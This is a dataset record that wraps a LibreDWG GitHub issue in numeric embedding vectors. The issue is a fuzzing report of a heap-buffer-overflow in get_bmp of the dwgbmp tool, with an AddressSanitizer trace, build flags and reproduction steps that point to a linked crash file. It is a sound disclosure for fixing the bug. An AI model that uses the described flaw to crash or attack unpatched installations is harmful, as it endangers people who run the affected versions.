0.01867852546274662, 0.0026873410679399967, 0.013427847996354103, -0.006005330476909876, -0.01317275408655405, 0.017261339351534843, 0.01592918299138546, 0.02302929013967514, 0.010210833512246609, 0.012081519700586796, -0.00765281030908227, 0.0008547409670427442, 0.001475646044127643, -0.0035004522651433945, -0.008460607379674911, 0.011975230649113655, 0.016411026939749718, 0.00010540329094510525, -0.005417197942733765, 0.01914619840681553, 0.004559799563139677, -0.013257785700261593, -0.0011461500544101, -0.020790135487914085, 0.005045186262577772, -0.008226770907640457, -0.00558371702209115, 0.022731680423021317, 0.013527050614356995, 0.0037732606288045645, -0.01947215013206005, -0.003727202070876956, -0.00150487560313195, 0.012223239056766033, 0.0073339431546628475, 0.013938034884631634, -0.002451733686029911, -0.0007387087680399418, 0.002666083164513111, -0.010494270361959934, -0.006058475002646446, -0.013945121318101883, 0.008255114778876305, -0.02302929013967514, -0.0009052282548509538, -0.00790081825107336, -0.007914990186691284, 0.010253348387777805, -0.012598793022334576, 0.020535040646791458, -0.014540339820086956, -0.01614176109433174, 0.0211869478225708, -0.0114508718252182, -0.016552746295928955, -0.012272840365767479, -0.0021470384672284126, -0.02495666593313217, -0.006249795202165842, -0.018763557076454163, -0.026416366919875145, 0.004049612209200859, 0.006809583865106106, -0.014951324090361595, 0.010919426567852497, 0.0015190474223345518, -0.003124897601082921, -0.0028857472352683544, -0.0007400374161079526, 0.009069997817277908, 0.002515507163479924, -0.01179808285087347, 0.004630658775568008, -0.009204630739986897, 0.010969027876853943, 0.03747042641043663, 0.003172727767378092, -0.028442945331335068, -0.0017519976245239377, -0.018012449145317078, 0.02257579006254673, -0.021172774955630302, 0.012754684314131737, -0.013782144524157047, -0.020464181900024414, 0.002200182992964983, -0.013590824790298939, 0.007007990498095751, 0.021498728543519974, 0.01570243388414383, 0.009948653168976307, -0.0009238288621418178, 0.008701528422534466, 0.037300363183021545, 0.012846801429986954, 0.01568826101720333, 0.008382662199437618, -0.012747597880661488, -0.001213466515764594, 0.0073339431546628475, -0.009055825881659985, -0.001829942804761231, 0.011720137670636177, 0.011599676683545113, -0.012860973365604877, 0.015787463635206223, 0.02222149446606636, 0.013144410215318203, -0.036591771990060806, -0.0026129386387765408, 0.008219685405492783, -0.001689995639026165, 0.010062028653919697, 0.017587292939424515, -0.010536786168813705, -0.016425197944045067, 0.0039858389645814896, -0.024318931624293327, 0.004949525929987431, 0.028938960283994675, -0.031574927270412445, -0.015957526862621307, 0.028811413794755936, -0.010359637439250946, 0.019316259771585464, 0.01328612957149744, 0.022944258525967598, 0.019061166793107986, 0.033615678548812866, -0.012754684314131737, 0.009629786014556885, -0.015943355858325958, 0.003287874162197113, -0.024375617504119873, -0.00009571549162501469, -0.013385332189500332, -0.014001809060573578, -0.014285245910286903, -0.017048761248588562, -0.0004721004515886307, -0.012634223327040672, 0.011358754709362984, -0.009126684628427029, 0.013208183459937572, -0.009225888177752495, 0.029505835846066475, -0.024488992989063263, 0.022533275187015533, 0.03883092850446701, -0.005920299328863621, 0.006157678086310625, 0.01421438716351986, 0.005941556766629219, -0.009303833357989788, 0.0015411910135298967, 0.011599676683545113, -0.003509309608489275, -0.00003529127934598364, 0.02165461890399456, -0.007007990498095751, -0.003663428593426943, 0.025055868551135063, 0.011132004670798779, -0.04087167605757713, 0.0117343096062541, 0.014079754240810871, 0.000597432954236865, -0.0007333943503908813, -0.0007940676296129823, 0.007681154180318117, -0.023553648963570595, -0.016439370810985565, -0.018310056999325752, -0.010359637439250946, 0.029420804232358932, 0.0033675909508019686, -0.006632435601204634, -0.026487227529287338, 0.013739628717303276, 0.006168306805193424, -0.00012300741218496114, 0.006253337953239679, 0.007780357263982296, -0.0064623733051121235, -0.01959969848394394, -0.004740491043776274, -0.007688240148127079, 0.00024734344333410263, 0.007312685716897249, 0.014412793330848217, -0.010444669052958488, -0.011854770593345165, 0.035684771835803986, -0.015050526708364487, -0.010912341065704823, 0.002536764834076166, 0.0038653777446597815, -0.00009034568211063743, -0.007103650365024805, -0.0018131138058379292, 0.018239198252558708, 0.023298555985093117, 0.008496036753058434, -0.004903467372059822, 0.011217036284506321, -0.0010008884128183126, -0.0183384008705616, 0.004226760473102331, -0.026983242481946945, 0.009891966357827187, -0.015461510978639126, -0.014767089858651161, 0.0023117864038795233, 0.016198448836803436, 0.006550947204232216, 0.023284384980797768, -0.013895520009100437, 0.0038724637124687433, 0.0211869478225708, 0.019741415977478027, -0.0038547490257769823, 0.020364979282021523, -0.010416325181722641, 0.019302088767290115, 0.00547742797061801, 0.004878666717559099, 0.015390652231872082, 0.015886668115854263, -0.004694432485848665, 0.016793666407465935, -0.018026620149612427, -0.01720465160906315, 0.01958552561700344, 0.00041187001625075936, 0.0039362371899187565, -0.013909691944718361, -0.005381768103688955, 0.020549213513731956, -0.0033339327201247215, 0.0015084185870364308, 0.00472631910815835, -0.009197544306516647, -0.03276536613702774, 0.008517294190824032, -0.018536807969212532, -0.010621817782521248, -0.006632435601204634, -0.015631573274731636, -0.006473002023994923, -0.019174542278051376, 0.0018724584951996803, 0.010685591027140617, 0.008099224418401718, -0.017346370965242386, -0.0009929167572408915, -0.0028520890045911074, 0.010607645846903324, 0.0056439475156366825, 0.008432263508439064, 0.014341933652758598, 0.02142786979675293, 0.010437583550810814, -0.006784783210605383, 0.005874240770936012, 0.009112512692809105, -0.010798965580761433, 0.024333102628588676, -0.018054964020848274, 0.007220568135380745, 0.01076353620737791, -0.005537658464163542, -0.011911457404494286, 0.013016863726079464, 0.002274585422128439, 0.00865901354700327, -0.005491599906235933, 0.017048761248588562, 0.00035739687155000865, -0.028839757665991783, 0.009204630739986897, -0.013569566421210766, -0.019543010741472244, -0.004021268337965012, 0.013080636970698833, -0.006635978817939758, -0.007046963088214397, 0.016807839274406433, 0.003027465892955661, -0.00036913296207785606, -0.0040460689924657345, -0.0031939854379743338, -0.011209949851036072, -0.0022232122719287872, 0.028967304155230522, -0.0011000914964824915, -0.01901865191757679, 0.003351647639647126, 0.0062958537600934505, 0.017006244510412216, -0.002418075455352664, 0.00045150695950724185, -0.020421667024493217, -0.003571311477571726, 0.004977869801223278, -0.003925608471035957, -0.008963708765804768, 0.020364979282021523, -0.010274606756865978, 0.00012101449101464823, 0.012917660176753998, -0.0032595302909612656, -0.0003449964860919863, -0.012372043915092945, 0.009190458804368973, -0.019528837874531746, -0.015248933807015419, -0.0008126682369038463, -0.010784793645143509, -0.0005757322651334107, 0.025126727297902107, 0.021342838183045387, 0.0019291460048407316, 0.010699762962758541, 0.01203191839158535, -0.019075337797403336, -0.00865901354700327, -0.04067327082157135, 0.010990286245942116, -0.0038512060418725014, -0.012775941751897335, 0.003705944400280714, 0.006586377043277025, -0.02441813424229622, -0.02293008752167225, 0.006097447592765093, 0.012563363648951054, 0.01706293225288391, 0.012294097803533077, 0.008340146392583847, 0.009608528576791286, 0.018139995634555817, 0.021697135642170906, -0.0017803412629291415, -0.014256902039051056, -0.009240060113370419, -0.0068237558007240295, -0.03732870891690254, -0.009140856564044952, -0.017388885840773582, -0.002244470175355673, 0.014653714373707771, 0.0026324251666665077, 0.010345465503633022, -0.001985833514481783, -0.011365840211510658, 0.011776824481785297, -0.009197544306516647, -0.003702401416376233, -0.010628903284668922, 0.0094526382163167, -0.003932694438844919, -0.022178977727890015, -0.022264009341597557, -0.0206342451274395, 0.006908786948770285, 0.016651948913931847, 0.026969071477651596, -0.007695326115936041, 0.03143320977687836, 0.015532370656728745, 0.0030894679948687553, -0.012783028185367584, 0.028953133150935173, 0.031801678240299225, -0.0028928332030773163, 0.012152379378676414, -0.0010425182990729809, 0.006628892850130796, 0.006969017442315817, 0.01558905839920044, 0.0011736081214621663, 0.019061166793107986, 0.025041695684194565, -0.007978763431310654, -0.018607666715979576, 0.0008777702460065484, -0.007461490109562874, 0.0027351712342351675, -0.0038122334517538548, -0.012464161030948162, 0.014710402116179466, -0.015220589935779572, -0.009728989563882351, 0.011153263039886951, -0.002846774645149708, 0.004226760473102331, 0.0022232122719287872, -0.019571354612708092, -0.015532370656728745, 0.016751151531934738, -0.0016882241470739245, -0.024233900010585785, 0.021144431084394455, 0.01651022955775261, 0.011812254786491394, -0.009573099203407764, -0.002669626148417592, -0.00427281903102994, 0.01214529387652874, -0.007886646315455437, -0.004651916678994894, 0.0014783033402636647, 0.017799871042370796, -0.0026005383115261793, -0.008744044229388237, 0.013101894408464432, 0.002928262809291482, 0.004577514249831438, 0.015277276746928692, -0.0046802605502307415, 0.01880607381463051, -0.03302045911550522, -0.03559974208474159, -0.014072667807340622, -0.0012267526471987367, 0.011287895031273365, -0.006529689766466618, -0.00550222909078002, -0.006005330476909876, -0.006717466749250889, 0.00713553698733449, -0.009976997040212154, -0.0037661746609956026, -0.0037590889260172844, 0.008085052482783794, -0.03772551938891411, 0.027762696146965027, 0.010324208065867424, 0.019202886149287224, 0.012074434198439121, -0.004595229402184486, -0.003659885609522462, -0.007638638373464346, -0.013739628717303276, 0.005069986917078495, 0.027564289048314095, 0.0021771537140011787, -0.0061541348695755005, 0.009835278615355492, -0.005576631519943476, -0.012882230803370476, 0.01551819872111082, -0.022292353212833405, 0.01775735430419445, 0.009509325958788395, 0.023326899856328964, 0.01961386948823929, 0.005193990655243397, 0.009736075066030025, 0.012357871979475021, -0.019387120380997658, 0.028811413794755936, 0.01604255847632885, 0.0028591749724000692, 0.015844151377677917, 0.0008835275657474995, 0.0037520029582083225, -0.012053176760673523, -0.004740491043776274, 0.020336635410785675, 0.00429762015119195, 0.01551819872111082, 0.001457045553252101, 0.003822862170636654, 0.015050526708364487, -0.005750236567109823, -0.018380917608737946, 0.003932694438844919, 0.0005163875757716596, 0.005562459584325552, -0.00824802927672863, 0.00012976118887308985, 0.002876889891922474, -0.012329528108239174, 0.02293008752167225, -0.018593495711684227, -0.020832650363445282, -0.020421667024493217, 0.015844151377677917, 0.01683618314564228, 0.014795433729887009, 0.0020212631206959486, 0.01925957202911377, 0.0234686192125082, -0.0014402164379134774, 0.01244290266185999, -0.005785666406154633, 0.026402195915579796, -0.01925957202911377, -0.0016882241470739245, 0.013427847996354103, -0.0067883264273405075, 0.010494270361959934, -0.008899935521185398, 0.0013117837952449918, -0.0005363167729228735, -0.015362308360636234, 0.003431364195421338, 0.002510192571207881, -0.014178956858813763, 0.01720465160906315, -0.016184275969862938, -0.017558949068188667, -0.01571660488843918, -0.0075890370644629, -0.029704241082072258, -0.012294097803533077, -0.007546521257609129, -0.011394184082746506, -0.012903488241136074, -0.0015039897989481688, -0.023737885057926178, 0.002366702537983656, 0.007695326115936041, -0.002077950630337, -0.029080679640173912, -0.001741368672810495, 0.001068204757757485, -0.01076353620737791, 0.04940314218401909, 0.016552746295928955, 0.019217057153582573, 0.021966399624943733, -0.011776824481785297, 0.0007648381870239973, 0.0026873410679399967, 0.001324184238910675, 0.015277276746928692, -0.015957526862621307, -0.01592918299138546, 0.0004543856193777174, 0.000532330886926502, -0.024814946576952934, -0.012357871979475021, -0.012818457558751106, 0.004503112286329269, 0.00023250725644174963, -0.025055868551135063, -0.011805168353021145, 0.01649605855345726, -0.016581088304519653, 0.006912330165505409, 0.0022161263041198254, -0.013853004202246666, 0.008212598972022533, -0.009509325958788395, -0.007787443231791258, -0.005162104032933712, -0.015333964489400387, -0.0007790100644342601, 0.006147048901766539, -0.007851216942071915, -0.011783910915255547, 0.018947791308164597, -0.023284384980797768, -0.008517294190824032, 0.017346370965242386, -0.025225929915905, 0.004304705653339624, -0.020095713436603546, -0.028485460206866264, 0.008099224418401718, 0.010324208065867424, -0.023213524371385574, 0.024106353521347046, -0.01798410527408123, 0.020265774801373482, 0.012393301352858543, 0.018295885995030403, -0.0008658127626404166, 0.009976997040212154, 0.01397346518933773, 0.028003618121147156, -0.0085952403023839, -0.007078849710524082, 0.010366723872721195, 0.005080615635961294, -0.03046952374279499, 0.004921182058751583, 0.003883092664182186, 0.01506469864398241, -0.01472457405179739, -0.005158561281859875, -0.0014800748322159052, -0.010635989718139172, 0.028485460206866264, 0.008191341534256935, 0.018848588690161705, 0.04160861298441887, -0.004832608159631491, -0.014511995948851109, -0.01743140071630478, -0.02267499454319477, 0.007872474379837513, -0.0269123837351799, -0.005463256500661373, -0.0016093931626528502, -0.0010903483489528298, -0.013845917768776417, -0.013668769970536232, -0.005732521880418062, 0.013746715150773525, -0.00985653605312109, 0.00790081825107336, -0.008496036753058434, -0.004903467372059822, -0.00865192711353302, 0.0013844146160408854, 0.010565130040049553, 0.004102756734937429, 0.012308269739151001, 0.0003308246086817235, -0.017105448991060257, 0.003080610418692231, -0.0053923968225717545, 0.019557181745767593, 0.0030097512062639, -0.002972549991682172, -0.000946858141105622, 0.003186899470165372, 0.002570423064753413, -0.0257928054779768, 0.01672280766069889, 0.011868942528963089, -0.00841809157282114, 0.005505771841853857, -0.02576446160674095, -0.021215291693806648, -0.010175403207540512, -0.002910548122599721, 0.015645746141672134, -0.006455287337303162, -0.019854791462421417, -0.0011886657448485494, -0.00996991153806448, -0.0056439475156366825, -0.014193128794431686, 0.02396463416516781, 0.009140856564044952, -0.01100445818156004, 0.005463256500661373, -0.01628348045051098, -0.01582998037338257, -0.0005522600840777159, 0.00328255956992507, 0.006692666094750166, -0.013732543215155602, 0.004857408814132214, 0.0015810494078323245, -0.017332198098301888, 0.010047856718301773, 0.01880607381463051, 0.00658992026001215, 0.018026620149612427, 0.009225888177752495, -0.0036917724646627903, 0.007245369255542755, 0.0018919447902590036, 0.0027050559874624014, 0.013194012455642223, 0.021116087213158607, 0.00429762015119195, -0.009941567666828632, -0.016793666407465935, 0.0018919447902590036, -0.022774197161197662, -0.029279084876179695, -0.009927395731210709, 0.00015511555830016732, 0.02372371219098568, 0.0032294150441884995, 0.005959271918982267, -0.02441813424229622, 0.006441115401685238, 0.01220198068767786, -0.0038334911223500967, 0.0177431832998991, -0.008155912160873413, 0.010288778692483902, -0.0004207274178043008, 0.0063135684467852116, 0.022193150594830513, -0.03239689767360687, 0.015149730257689953, -0.007029247935861349, 0.01156424731016159, -0.0019876048900187016, 0.012074434198439121, -0.002733399625867605, -0.018253369256854057, -0.003319760784506798, -0.024205556139349937, -0.007454404141753912, 0.021682962775230408, 0.03469274193048477, 0.009998255409300327, 0.021456213667988777, 0.01617010496556759, 0.004060240928083658, 0.017573120072484016, 0.009551840834319592, -0.017955761402845383, 0.009998255409300327, -0.0015633344883099198, -0.0011558932019397616, 0.0031195832416415215, -0.01420730073004961, 0.02339775860309601, 0.012350785546004772, -0.003254215931519866, -0.015560714527964592, 0.023879602551460266, 0.007787443231791258, -0.014093926176428795, 0.01683618314564228, 0.0010611189063638449, 0.014710402116179466, 0.01007620058953762, 0.008637755177915096, -0.003569540102034807, -0.0030558097641915083, 0.028357913717627525, 0.002515507163479924 ]
2,295
null
null
null
null
null
null
null
null
null
[ "LibreDWG", "libredwg" ]
## Affected version the latest commit: https://github.com/LibreDWG/libredwg/tree/45d2a290c65ed691be0901ba2b2ef51044e07a16 and 0.12.4 ## What's the problem? A heap buffer overflow was discovered in get_bmp in programs/dwgbmp.c:182. ASAN report: ``` $ ./dwgbmp ./pocs/tests_64219 /dev/null ================================================================= ==17975==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6290000042ef at pc 0x00000043449e bp 0x7ffde9425050 sp 0x7ffde9424818 READ of size 16520 at 0x6290000042ef thread T0 #0 0x43449d in fwrite (/root/fuzz/dwgbmp+0x43449d) #1 0x4c619e in get_bmp /root/fuzz/45d2a29/programs/dwgbmp.c:182:12 #2 0x4c5bcf in main /root/fuzz/45d2a29/programs/dwgbmp.c:301:11 #3 0x7facb795d83f in __libc_start_main /build/glibc-S7Ft5T/glibc-2.23/csu/../csu/libc-start.c:291 #4 0x41ba28 in _start (/root/fuzz/dwgbmp+0x41ba28) 0x6290000042ef is located 0 bytes to the right of 16623-byte region [0x629000000200,0x6290000042ef) allocated by thread T0 here: #0 0x4959f2 in calloc (/root/fuzz/dwgbmp+0x4959f2) #1 0x4ebf1d in decode_R13_R2000 /root/fuzz/45d2a29/src/decode.c:1028:36 #2 0x4e48a1 in dwg_decode /root/fuzz/45d2a29/src/decode.c:246:36 #3 0x4c75ec in dwg_read_file /root/fuzz/45d2a29/src/dwg.c:254:11 #4 0x4c5ead in get_bmp /root/fuzz/45d2a29/programs/dwgbmp.c:120:11 #5 0x4c5bcf in main /root/fuzz/45d2a29/programs/dwgbmp.c:301:11 #6 0x7facb795d83f in __libc_start_main /build/glibc-S7Ft5T/glibc-2.23/csu/../csu/libc-start.c:291 SUMMARY: AddressSanitizer: heap-buffer-overflow (/root/fuzz/dwgbmp+0x43449d) in fwrite Shadow bytes around the buggy address: 0x0c527fff8800: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c527fff8810: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c527fff8820: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c527fff8830: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c527fff8840: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c527fff8850: 00 00 00 00 00 00 00 00 00 00 00 00 00[07]fa fa 0x0c527fff8860: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c527fff8870: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c527fff8880: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c527fff8890: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c527fff88a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==17975==ABORTING ``` ## Compile command ``` CC="clang" CFLAGS="-O1 -g -fsanitize=address" ./configure --enable-release --disable-shared && make ``` ## How can we reproduce the issue? ``` unzip tests_64219.zip dwgbmp ./tests_64219 ``` POC file : [tests_64219.zip](https://github.com/LibreDWG/libredwg/files/6614957/tests_64219.zip)
Heap-buffer-overflow in get_bmp in programs/dwgbmp.c:182
https://api.github.com/repos/LibreDWG/libredwg/issues/354/comments
2
2021-06-08T08:49:06
2022-02-06T18:55:00Z
https://github.com/LibreDWG/libredwg/issues/354
914,610,848
354
false
This is a GitHub Issue repo:libredwg owner:LibreDWG Title : Heap-buffer-overflow in get_bmp in programs/dwgbmp.c:182 Issue date: --- start body --- ## Affected version the latest commit: https://github.com/LibreDWG/libredwg/tree/45d2a290c65ed691be0901ba2b2ef51044e07a16 and 0.12.4 ## What's the problem? A heap buffer overflow was discovered in get_bmp in programs/dwgbmp.c:182. ASAN report: ``` $ ./dwgbmp ./pocs/tests_64219 /dev/null ================================================================= ==17975==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6290000042ef at pc 0x00000043449e bp 0x7ffde9425050 sp 0x7ffde9424818 READ of size 16520 at 0x6290000042ef thread T0 #0 0x43449d in fwrite (/root/fuzz/dwgbmp+0x43449d) #1 0x4c619e in get_bmp /root/fuzz/45d2a29/programs/dwgbmp.c:182:12 #2 0x4c5bcf in main /root/fuzz/45d2a29/programs/dwgbmp.c:301:11 #3 0x7facb795d83f in __libc_start_main /build/glibc-S7Ft5T/glibc-2.23/csu/../csu/libc-start.c:291 #4 0x41ba28 in _start (/root/fuzz/dwgbmp+0x41ba28) 0x6290000042ef is located 0 bytes to the right of 16623-byte region [0x629000000200,0x6290000042ef) allocated by thread T0 here: #0 0x4959f2 in calloc (/root/fuzz/dwgbmp+0x4959f2) #1 0x4ebf1d in decode_R13_R2000 /root/fuzz/45d2a29/src/decode.c:1028:36 #2 0x4e48a1 in dwg_decode /root/fuzz/45d2a29/src/decode.c:246:36 #3 0x4c75ec in dwg_read_file /root/fuzz/45d2a29/src/dwg.c:254:11 #4 0x4c5ead in get_bmp /root/fuzz/45d2a29/programs/dwgbmp.c:120:11 #5 0x4c5bcf in main /root/fuzz/45d2a29/programs/dwgbmp.c:301:11 #6 0x7facb795d83f in __libc_start_main /build/glibc-S7Ft5T/glibc-2.23/csu/../csu/libc-start.c:291 SUMMARY: AddressSanitizer: heap-buffer-overflow (/root/fuzz/dwgbmp+0x43449d) in fwrite Shadow bytes around the buggy address: 0x0c527fff8800: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c527fff8810: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c527fff8820: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c527fff8830: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c527fff8840: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c527fff8850: 00 00 00 00 00 00 00 00 00 00 00 00 00[07]fa fa 0x0c527fff8860: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c527fff8870: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c527fff8880: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c527fff8890: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c527fff88a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==17975==ABORTING ``` ## Compile command ``` CC="clang" CFLAGS="-O1 -g -fsanitize=address" ./configure --enable-release --disable-shared && make ``` ## How can we reproduce the issue? ``` unzip tests_64219.zip dwgbmp ./tests_64219 ``` POC file : [tests_64219.zip](https://github.com/LibreDWG/libredwg/files/6614957/tests_64219.zip) --- end body ---
3,633
[ -0.029950201511383057, 0.01719912514090538, -0.004764804616570473, 0.0013554757460951805, 0.0612482950091362, 0.0447770319879055, -0.0007885178783908486, 0.04307868704199791, -0.025893040001392365, 0.006928174290806055, -0.038711510598659515, -0.012575848959386349, 0.030058031901717186, -0.002716006012633443, 0.013977658934891224, 0.021148454397916794, -0.013391325250267982, 0.019450107589364052, -0.0034775659441947937, -0.009219593368470669, 0.018237004056572914, -0.02790140174329281, -0.015392947010695934, 0.035961806774139404, -0.0362313874065876, 0.0017943836282938719, 0.0032568485476076603, 0.0027294850442558527, -0.002330171409994364, 0.00172698893584311, 0.007487550377845764, 0.040625520050525665, -0.007554945070296526, -0.00003735666541615501, 0.02521909400820732, 0.003555069910362363, 0.02666134014725685, 0.08098146319389343, 0.000014926870790077373, 0.004865896888077259, 0.01070901658385992, -0.05725852772593498, -0.003295600414276123, 0.016134288161993027, -0.022792885079979897, 0.0036763804964721203, 0.010203556157648563, -0.01672736182808876, -0.029222337529063225, 0.007696473505347967, 0.00820867344737053, -0.016606051474809647, -0.016916068270802498, -0.03474870324134827, 0.0018314507324248552, -0.009563306346535683, 0.020272323861718178, 0.04890158772468567, -0.00025336191174574196, 0.0036089858040213585, -0.027982275933027267, 0.005863338243216276, 0.013357628136873245, 0.03420954570174217, -0.014543774537742138, -0.008249110542237759, -0.012798251584172249, 0.022752447053790092, -0.03181029483675957, 0.00597116956487298, -0.012063649483025074, -0.021714570000767708, 0.03159463033080101, 0.03455999866127968, 0.035692229866981506, 0.004444679711014032, 0.026351323351264, 0.022038063034415245, -0.033023398369550705, 0.04286302253603935, -0.03895413130521774, 0.0306241475045681, -0.035907890647649765, 0.04043681547045708, 0.026068266481161118, -0.0016882369527593255, -0.022644616663455963, -0.07591337710618973, -0.03345472365617752, -0.053241804242134094, 0.0021448361221700907, 0.02155282162129879, 0.01004180870950222, -0.0033141339663416147, 0.01178733166307211, -0.0074605923146009445, -0.038684550672769547, -0.013182401657104492, -0.037741027772426605, 0.002385772066190839, -0.02063625492155552, -0.015433384105563164, -0.019800560548901558, 0.004663712810724974, 0.03232249245047569, 0.0229681096971035, 0.01761697232723236, -0.021040622144937515, 0.010412479750812054, 0.1290743052959442, -0.02343987300992012, -0.007716692052781582, -0.03189116716384888, 0.026041308417916298, -0.008471512235701084, 0.03245728462934494, 0.04226994886994362, 0.02286027930676937, -0.047553692013025284, -0.004427831154316664, -0.026081744581460953, -0.05262177437543869, -0.04000549018383026, 0.0026721993926912546, -0.022011106833815575, 0.03469478711485863, -0.011295350268483162, -0.020878875628113747, -0.04472311586141586, -0.013067830353975296, -0.016606051474809647, -0.045531854033470154, 0.01219169981777668, -0.01769784651696682, -0.0019342276500537992, -0.0113290473818779, -0.013458719477057457, 0.04693366214632988, 0.025232572108507156, -0.00859956257045269, -0.056988950818777084, -0.05833684280514717, 0.002675569150596857, -0.003632573876529932, -0.009522870182991028, 0.014031575061380863, -0.014476379379630089, 0.0021060840226709843, -0.004154882859438658, 0.00865347869694233, 0.005620717070996761, -0.004929921589791775, 0.0509234294295311, 0.002313322853296995, 0.04040985554456711, -0.015163805335760117, -0.014638126827776432, 0.03714795410633087, -0.008950014598667622, -0.001042090356349945, 0.006025085225701332, -0.03221466392278671, 0.013148704543709755, -0.049467701464891434, -0.04226994886994362, 0.001802808023057878, 0.018398750573396683, 0.02218633145093918, 0.004663712810724974, 0.02252330631017685, 0.010196817107498646, 0.0011010607704520226, 0.0003571918641682714, 0.01703737862408161, -0.07278626412153244, 0.0035449606366455555, -0.010971855372190475, 0.01380243245512247, -0.03234945237636566, -0.020878875628113747, -0.008828704245388508, -0.01664648950099945, 0.006813603453338146, 0.011254913173615932, 0.012872385792434216, -0.01259606797248125, 0.007096660789102316, -0.032915566116571426, 0.008134539239108562, -0.0122186578810215, -0.020258843898773193, -0.03070502169430256, 0.01048661395907402, -0.038900215178728104, 0.04801197722554207, -0.011544710956513882, -0.03256511315703392, -0.004916442558169365, 0.023952072486281395, -0.006914695259183645, 0.0017809047130867839, 0.012926301918923855, -0.04208124428987503, 0.019045740365982056, -0.008309765718877316, 0.024949515238404274, -0.027335286140441895, 0.045343149453401566, 0.014382027089595795, -0.03197203949093819, -0.01908617652952671, -0.013108267448842525, -0.014058532193303108, -0.003710077842697501, -0.03598876670002937, 0.017185647040605545, 0.01025073230266571, -0.01922096498310566, -0.00439076405018568, -0.0014557252870872617, 0.017414787784218788, 0.011504273861646652, -0.005516255274415016, -0.004343587905168533, -0.05043818801641464, -0.013263274915516376, 0.00961048249155283, 0.005988018121570349, -0.017482182011008263, -0.0007712480146437883, 0.03609659522771835, -0.026957876980304718, 0.016269078478217125, -0.008619780652225018, 0.0020740716718137264, -0.005317441187798977, 0.006830452010035515, 0.02257722057402134, -0.038684550672769547, -0.004188579972833395, 0.0022829952649772167, 0.01761697232723236, 0.004053790587931871, -0.025515630841255188, 0.01969272829592228, 0.06141004338860512, -0.03439825028181076, 0.0002950623747892678, -0.021458469331264496, 0.014719000086188316, 0.018991824239492416, -0.004545771982520819, 0.012670202180743217, 0.00482545979321003, 0.003251793794333935, -0.023237688466906548, 0.017185647040605545, 0.033993881195783615, 0.006153135094791651, -0.009590264409780502, 0.03860367834568024, 0.017738282680511475, -0.02108106017112732, 0.020851917564868927, 0.01174689456820488, 0.0015146957011893392, -0.018924430012702942, 0.0027732914313673973, 0.01259606797248125, -0.015002057887613773, -0.01213778369128704, -0.015986019745469093, -0.020622774958610535, -0.030893726274371147, -0.009731793776154518, 0.025529108941555023, 0.02596043422818184, 0.0006701559759676456, 0.02260417863726616, -0.015595131553709507, -0.00606889184564352, 0.025084303691983223, -0.013586769811809063, 0.033993881195783615, -0.015527736395597458, -0.01620168425142765, 0.025515630841255188, -0.009212854318320751, -0.0043840245343744755, -0.005981278605759144, -0.017414787784218788, 0.0020824959501624107, -0.04580143094062805, -0.006843931041657925, 0.015002057887613773, 0.02197066880762577, -0.011625584214925766, -0.018735723569989204, -0.029977157711982727, 0.0023908265866339207, -0.0020959749817848206, -0.00820867344737053, -0.03337385132908821, -0.014934663660824299, 0.020771043375134468, -0.008484991267323494, -0.021512385457754135, 0.023790325969457626, 0.008201933465898037, 0.0024093601386994123, 0.05095038563013077, -0.055964551866054535, -0.008269328624010086, -0.008720872923731804, -0.021296722814440727, -0.00372692639939487, 0.005721809342503548, -0.022321121767163277, 0.001015132525935769, 0.028359685093164444, -0.047364987432956696, -0.007912136614322662, -0.03447912260890007, 0.02881797030568123, 0.03243032470345497, -0.014975100755691528, -0.012973478063941002, 0.04297085478901863, -0.05806726589798927, 0.02571781352162361, 0.0060655223205685616, -0.031109388917684555, -0.00021629483671858907, -0.019382713362574577, 0.0010774725815281272, -0.05173216387629509, -0.013472198508679867, 0.025731293484568596, -0.007878439500927925, 0.0167812779545784, -0.012703899294137955, 0.020703649148344994, -0.019733166322112083, -0.016066893935203552, 0.004545771982520819, -0.015136847272515297, 0.016188204288482666, -0.0029333538841456175, -0.021822400391101837, -0.005863338243216276, 0.0009831200586631894, 0.05628804489970207, 0.032915566116571426, 0.04717628285288811, -0.009502651169896126, 0.005415163468569517, 0.0011078002862632275, -0.04051768779754639, -0.005880186799913645, -0.02197066880762577, 0.004262714181095362, -0.015042494982481003, 0.021687611937522888, 0.0029114505741745234, 0.029303211718797684, 0.025421276688575745, 0.019261403009295464, -0.0065103271044790745, -0.0064564114436507225, -0.0081682363525033, 